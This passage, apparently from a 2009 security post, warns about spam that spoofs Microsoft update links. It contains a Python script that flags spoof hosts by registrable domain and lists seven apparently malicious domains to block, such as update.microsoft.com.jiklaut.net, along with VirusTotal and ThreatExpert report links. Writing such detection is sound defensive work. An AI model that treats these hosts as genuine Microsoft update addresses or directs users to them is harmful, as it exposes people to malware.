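    return {"host": host, "registrable": reg, "verdict": verdict}

def find_spoofs(urls: List[str]) -> List[str]:
    """Registrable domains to block, one per spoofing URL, duplicates removed."""
    out: List[str] = []
    for u in urls:
        r = classify(u)
        reg = r["registrable"]
        if r["verdict"] == "spoof" and reg and reg not in out:
            out.append(reg)
    return out

# The URLs from the post (query strings trimmed), plus a genuine host for contrast.
SAMPLE_URLS = [
    "http://update.microsoft.com.jiklaut.net/microsoftofficeupdate/isapdl/default.aspx",
    "http://update.microsoft.com.ferrateu.net/microsoftofficeupdate/isapdl/default.aspx",
    "http://update.microsoft.com.ferratet.net/microsoftofficeupdate/isapdl/default.aspx",
    "update.microsoft.com.nsatc.net/microsoftofficeupdate/isapdl/default.aspx",
    "update.microsoft.com.il1if1.com.mx/microsoftofficeupdate/isapdl/default.aspx",
    "update.microsoft.com.herrjuy.vu/microsoftofficeupdate/isapdl/default.aspx/",
    "update.microsoft.com.ferratep.net/microsoftofficeupdate/isapdl/default.aspx/",
    "http://update.microsoft.com/",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        r = classify(u)
        print(f"{r['verdict']:8} {str(r['registrable']):16} {r['host']}")
    print("block:", ", ".join(find_spoofs(SAMPLE_URLS)))
```

The check is on the registrable domain, not on string matching alone, so a genuine host such as download.update.microsoft.com passes while the seven above are all flagged, and the output is the list of domains to block rather than individual URLs, which is what you want when the id= parameter changes with every mail.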

Jaxryley over at Malwarebytes has saved me some time, by providing the VT results;

http://www.virustotal.com/analisis/508348da73073323a5baf3406eea1bcb687e0eb987ada8b1ce6b126f7d8bdab0-1249432378

With the Threat Expert results available at;

http://www.threatexpert.com/report.aspx?md5=d04b69dda52305d88e1bf7fe2b2a6034

For clarity, one of the e-mails I received, is shown below.



/edit 05-08-09 04:41

Added update.microsoft.com.ferratep.net